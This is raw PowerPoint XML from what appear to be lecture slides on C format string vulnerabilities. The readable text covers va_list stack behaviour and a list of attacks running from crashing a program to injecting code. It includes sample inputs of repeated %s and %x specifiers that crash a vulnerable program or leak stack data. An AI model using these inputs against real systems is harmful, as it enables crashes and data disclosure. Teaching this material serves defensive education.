              <a:tr h="263965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((</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-NZ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(unsigned) char *)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435771"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="343659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of bytes written so far,(* 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2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1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06C4-31B5-4896-8AC7-9015FA3D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Missing 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ACCC-2BE3-4A08-9D5E-FB968757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057838"/>
            <a:ext cx="5710552" cy="25727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va_arg()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro doesn’t understand if it reached the end of the optional argument list.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continues fetching data from the stack and advancing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer.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BD0EC-A905-437C-82D3-036381CD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Shape 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F651835D-282B-4295-B5AE-7F3D81FD05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2576" y="2151065"/>
            <a:ext cx="3067688" cy="254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764F4-0EEA-426A-B322-25038D25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12" y="781418"/>
            <a:ext cx="4398264" cy="127642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40DEFB9-6A06-4F58-ADF2-2AD686421374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854283" y="781418"/>
            <a:ext cx="2115981" cy="1047382"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -50345"/>
              <a:gd name="adj2" fmla="val 681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It can lead to memory read/write</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181550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3F65-ECAC-41EC-82E9-08D0A145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Untrusted user input becomes format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E9A9-0A92-446F-B6AC-EFDB47BC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Format string treated as code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>A fundamental security principle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>Do not treat user data as code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2601-96DB-41AB-A57B-4D4E591F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655CD-FED5-4FAE-AD89-6A9CB5A6E179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1413750" y="2706487"/>
            <a:ext cx="15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Format string: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23370-2002-4877-9F5A-0D3F1CE5353B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1413750" y="3718185"/>
            <a:ext cx="15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User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4DE43-F0B8-45E3-8731-D174B81762F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3539916" y="2353440"/>
            <a:ext cx="211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Read from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9ABC5-9B07-4153-A979-08B8BF9DDC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3539916" y="3075819"/>
            <a:ext cx="211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Write to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DFE32-E969-4789-B389-C0A8408CE0C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5993184" y="2742964"/>
            <a:ext cx="211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E9390-DE93-4494-81ED-C9FE31297276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5993184" y="3718185"/>
            <a:ext cx="211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1CBA6E-12F1-43DC-8535-E0CD7D7E2F0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97224" y="3021563"/>
            <a:ext cx="542692" cy="23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57ECD2-9E8D-4E85-AF97-552CAD6979D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97224" y="2538106"/>
            <a:ext cx="542692" cy="26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3F33B1-F115-4FC1-8D5C-98F9881E4878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997224" y="3899747"/>
            <a:ext cx="28844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5CC4AA6-939E-41E7-B945-F4F64BD78A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5517400" y="2482046"/>
            <a:ext cx="475784" cy="894638"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30208"/>
              <a:gd name="adj2" fmla="val 533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AEEA039-ED62-442F-A723-3AE3927D846F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4121043" y="3613532"/>
            <a:ext cx="572429" cy="572429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CCC64-4F71-4853-855B-BD400F2E41BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067525" y="4224165"/>
            <a:ext cx="15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Format string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4E7F1A-C928-45D4-9D83-E4E6EB2EC555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2997224" y="4117876"/>
            <a:ext cx="2884449" cy="30951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DFDB90D8-B966-4B3E-9C01-5FABA55058E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4121043" y="4136595"/>
            <a:ext cx="572429" cy="572429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820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63AE-65C6-4BCA-AE50-56F910A8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Format string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963E-D9A6-4C87-BD3D-64A88E10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these three examples, user’s input (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) becomes part of a format string. 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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What will happen if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> contains format specifiers?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B9BD6-96A4-484C-80B3-4B6381B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79E6B5-8127-4B9C-97F7-5FA73D888CAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1812841" y="1846537"/>
            <a:ext cx="5536606" cy="2167901"/>
            <a:chOff x="1732854" y="1846537"/>
            <a:chExt cx="5536606" cy="21679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136919-AC13-47B2-A578-AE29193D3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854" y="1846537"/>
              <a:ext cx="5536606" cy="46876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11F5F8-10BC-4226-8130-465170A38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96"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1732854" y="2466700"/>
              <a:ext cx="5536606" cy="7422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ED40A2-F516-452A-AE3A-80485C4C1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741"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1732854" y="3324313"/>
              <a:ext cx="5536606" cy="69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35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0077-EE34-4DD2-B9B5-7BBF96A3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Vulnerable (Set-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>UID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
              <a:t>)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29B6D-386F-4F46-BFD7-EE044EB1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5AD2F9-55C1-46A5-8E7D-C392692CF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6104" y="893111"/>
            <a:ext cx="4654160" cy="3597114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{464780CC-3FC8-49D0-AE99-679D702B9F94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4653775" y="3331969"/>
            <a:ext cx="1267973" cy="27860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3630AA-28C5-4301-A6AB-875B8E883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" y="1796447"/>
            <a:ext cx="4015703" cy="17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5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FC9-D088-4C74-8278-F40FCD9E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Vulnerable program’s stack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2D0A-381C-42EC-A8A1-51731D45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4974708" cy="3763103"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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the starting point of the optional arguments (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pointer) is the position right above the format string argument.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A55C2-6460-42E1-A70B-97CB732A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128">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F99CE4-BF31-44D2-ACB2-F9706FEA77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3238" y="1116788"/>
            <a:ext cx="3698738" cy="290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78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C005-5335-4EA4-ADF1-A1372695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can we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E188-EBF7-44A5-B025-AB9073BE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Attack 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Crash program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attack 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Print out data on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attack 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Change the program’s data in the memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attack 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Change the program’s data to specific value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Attack 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Inject malicious code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5CBA-F430-4D2C-8D4A-759EDC96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28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6F9D19D9-C35A-4C18-A4EC-C963F4BF311E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2083469" y="793781"/>
            <a:ext cx="4392611" cy="1035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9BF40-C5C0-4694-B98E-16DCBDC5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Crash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DBF8-1103-4C36-88E4-FCCC03A4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030404"/>
            <a:ext cx="8778240" cy="26002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input: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s%s%s%s%s%s%s%s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parses the format string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For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dirty="0"/>
              <a:t>, it fetches a value where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>points to and advances </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to the next position.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we give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treats the value as address and fetches data from that address. If the value is not a valid address, the program crashes.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CC8A4-7B14-4633-87FE-45BA926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932F06BF-A620-4295-9E34-18D77DF5D6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03909" y="855266"/>
            <a:ext cx="4231314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3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CAFB-B94C-434F-9528-331D9FCC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Print out data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9A6-101B-4945-BA41-B0644260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001914"/>
            <a:ext cx="8778240" cy="26287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Suppose a variable on the stack contains a secret (constant) and we need to print it out.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use user input: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x%x%x%x%x%x%x%x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prints out the integer value pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer and advances it by 4 bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Number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/>
              <a:t> is decided by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>distance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> between the starting point of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer and the variable. It can be achieved by trial and error.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FEF5-C18C-4823-9210-E044C655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05CE4-1721-468F-B34C-C49F16B54268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090381" y="815815"/>
            <a:ext cx="6642332" cy="1035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8" name="Shape 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0035F4A2-A0A0-4738-B8D9-EFCADC6B74AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4175125" y="1593230"/>
            <a:ext cx="811212" cy="21898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AE044B5E-2218-4F7C-BF7C-198AD065524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74132" y="910119"/>
            <a:ext cx="6500813" cy="852488"/>
            <a:chOff x="2543176" y="2540000"/>
            <a:chExt cx="6500813" cy="852488"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="598" name="Freeform 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE1D8E4C-2871-40B5-86FB-AB4C592B730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51114" y="2590800"/>
              <a:ext cx="74613" cy="87313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0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0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8 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 162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7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3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9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" name="Freeform 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{479B602D-A4B4-403D-ACE5-8106CD38F62A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647951" y="2590800"/>
              <a:ext cx="77788" cy="87313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" name="Freeform 142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{443FD728-B86A-4F19-9CE7-34DDDD78E57F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747964" y="2590800"/>
              <a:ext cx="77788" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 183 w 203"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 203"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 203"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 203 w 203"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 203"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 203"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 203"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 203"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 183 w 203"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 35 w 203"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 203"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168 w 203"/>
                <a:gd name="T27" fmla="*/ 94 h 222"/>
                <a:gd name="T28" fmla="*/ 35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183" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="124"/>
                    <a:pt x="203" y="124"/>
                    <a:pt x="203" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203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3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1" name="Freeform 143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9637705-DE3A-4CCA-9905-20D524F98F7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844801" y="2555875"/>
              <a:ext cx="92075" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 160 w 237"/>
                <a:gd name="T1" fmla="*/ 280 h 308"/>
                <a:gd name="T2" fmla="*/ 180 w 237"/>
                <a:gd name="T3" fmla="*/ 305 h 308"/>
                <a:gd name="T4" fmla="*/ 216 w 237"/>
                <a:gd name="T5" fmla="*/ 305 h 308"/>
                <a:gd name="T6" fmla="*/ 237 w 237"/>
                <a:gd name="T7" fmla="*/ 290 h 308"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 275 h 308"/>
                <a:gd name="T10" fmla="*/ 195 w 237"/>
                <a:gd name="T11" fmla="*/ 275 h 308"/>
                <a:gd name="T12" fmla="*/ 195 w 237"/>
                <a:gd name="T13" fmla="*/ 21 h 308"/>
                <a:gd name="T14" fmla="*/ 175 w 237"/>
                <a:gd name="T15" fmla="*/ 0 h 308"/>
                <a:gd name="T16" fmla="*/ 138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0 w 237"/>
                <a:gd name="T23" fmla="*/ 31 h 308"/>
                <a:gd name="T24" fmla="*/ 160 w 237"/>
                <a:gd name="T25" fmla="*/ 110 h 308"/>
                <a:gd name="T26" fmla="*/ 102 w 237"/>
                <a:gd name="T27" fmla="*/ 87 h 308"/>
                <a:gd name="T28" fmla="*/ 0 w 237"/>
                <a:gd name="T29" fmla="*/ 198 h 308"/>
                <a:gd name="T30" fmla="*/ 97 w 237"/>
                <a:gd name="T31" fmla="*/ 308 h 308"/>
                <a:gd name="T32" fmla="*/ 160 w 237"/>
                <a:gd name="T33" fmla="*/ 280 h 308"/>
                <a:gd name="T34" fmla="*/ 160 w 237"/>
                <a:gd name="T35" fmla="*/ 173 h 308"/>
                <a:gd name="T36" fmla="*/ 160 w 237"/>
                <a:gd name="T37" fmla="*/ 208 h 308"/>
                <a:gd name="T38" fmla="*/ 99 w 237"/>
                <a:gd name="T39" fmla="*/ 278 h 308"/>
                <a:gd name="T40" fmla="*/ 34 w 237"/>
                <a:gd name="T41" fmla="*/ 198 h 308"/>
                <a:gd name="T42" fmla="*/ 104 w 237"/>
                <a:gd name="T43" fmla="*/ 118 h 308"/>
                <a:gd name="T44" fmla="*/ 160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0" y="280"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="298"/>
                    <a:pt x="160" y="305"/>
                    <a:pt x="180" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="216" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="305"/>
                    <a:pt x="237" y="305"/>
                    <a:pt x="237" y="290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10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7" y="87"/>
                    <a:pt x="0" y="135"/>
                    <a:pt x="0" y="198"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="260"/>
                    <a:pt x="44" y="308"/>
                    <a:pt x="97" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="308"/>
                    <a:pt x="146" y="295"/>
                    <a:pt x="160" y="280"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="160" y="173"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="160" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="236"/>
                    <a:pt x="138" y="278"/>
                    <a:pt x="99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0" y="146"/>
                    <a:pt x="160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2" name="Freeform 144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7E19591-9E8B-4C07-893A-1CAE0B0FBF30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946401" y="2554288"/>
              <a:ext cx="84138" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 178 w 217"/>
                <a:gd name="T1" fmla="*/ 66 h 311"/>
                <a:gd name="T2" fmla="*/ 146 w 217"/>
                <a:gd name="T3" fmla="*/ 56 h 311"/>
                <a:gd name="T4" fmla="*/ 73 w 217"/>
                <a:gd name="T5" fmla="*/ 156 h 311"/>
                <a:gd name="T6" fmla="*/ 145 w 217"/>
                <a:gd name="T7" fmla="*/ 255 h 311"/>
                <a:gd name="T8" fmla="*/ 217 w 217"/>
                <a:gd name="T9" fmla="*/ 148 h 311"/>
                <a:gd name="T10" fmla="*/ 130 w 217"/>
                <a:gd name="T11" fmla="*/ 0 h 311"/>
                <a:gd name="T12" fmla="*/ 0 w 217"/>
                <a:gd name="T13" fmla="*/ 156 h 311"/>
                <a:gd name="T14" fmla="*/ 131 w 217"/>
                <a:gd name="T15" fmla="*/ 311 h 311"/>
                <a:gd name="T16" fmla="*/ 217 w 217"/>
                <a:gd name="T17" fmla="*/ 268 h 311"/>
                <a:gd name="T18" fmla="*/ 199 w 217"/>
                <a:gd name="T19" fmla="*/ 254 h 311"/>
                <a:gd name="T20" fmla="*/ 184 w 217"/>
                <a:gd name="T21" fmla="*/ 259 h 311"/>
                <a:gd name="T22" fmla="*/ 130 w 217"/>
                <a:gd name="T23" fmla="*/ 281 h 311"/>
                <a:gd name="T24" fmla="*/ 28 w 217"/>
                <a:gd name="T25" fmla="*/ 156 h 311"/>
                <a:gd name="T26" fmla="*/ 130 w 217"/>
                <a:gd name="T27" fmla="*/ 31 h 311"/>
                <a:gd name="T28" fmla="*/ 178 w 217"/>
                <a:gd name="T29" fmla="*/ 66 h 311"/>
                <a:gd name="T30" fmla="*/ 146 w 217"/>
                <a:gd name="T31" fmla="*/ 225 h 311"/>
                <a:gd name="T32" fmla="*/ 101 w 217"/>
                <a:gd name="T33" fmla="*/ 156 h 311"/>
                <a:gd name="T34" fmla="*/ 145 w 217"/>
                <a:gd name="T35" fmla="*/ 87 h 311"/>
                <a:gd name="T36" fmla="*/ 190 w 217"/>
                <a:gd name="T37" fmla="*/ 156 h 311"/>
                <a:gd name="T38" fmla="*/ 146 w 217"/>
                <a:gd name="T39" fmla="*/ 22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311">
                  <a:moveTo>
                    <a:pt x="178" y="66"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="65"/>
                    <a:pt x="162" y="56"/>
                    <a:pt x="146" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="56"/>
                    <a:pt x="73" y="99"/>
                    <a:pt x="73" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="215"/>
                    <a:pt x="108" y="255"/>
                    <a:pt x="145" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="255"/>
                    <a:pt x="217" y="234"/>
                    <a:pt x="217" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="116"/>
                    <a:pt x="217" y="0"/>
                    <a:pt x="130" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="0"/>
                    <a:pt x="0" y="66"/>
                    <a:pt x="0" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="245"/>
                    <a:pt x="61" y="311"/>
                    <a:pt x="131" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="311"/>
                    <a:pt x="217" y="283"/>
                    <a:pt x="217" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="254"/>
                    <a:pt x="204" y="254"/>
                    <a:pt x="199" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="254"/>
                    <a:pt x="189" y="254"/>
                    <a:pt x="184" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="275"/>
                    <a:pt x="147" y="281"/>
                    <a:pt x="130" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="281"/>
                    <a:pt x="28" y="227"/>
                    <a:pt x="28" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="82"/>
                    <a:pt x="78" y="31"/>
                    <a:pt x="130" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="31"/>
                    <a:pt x="166" y="36"/>
                    <a:pt x="178" y="66"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="146" y="225"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="225"/>
                    <a:pt x="101" y="195"/>
                    <a:pt x="101" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="114"/>
                    <a:pt x="124" y="87"/>
                    <a:pt x="145" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="87"/>
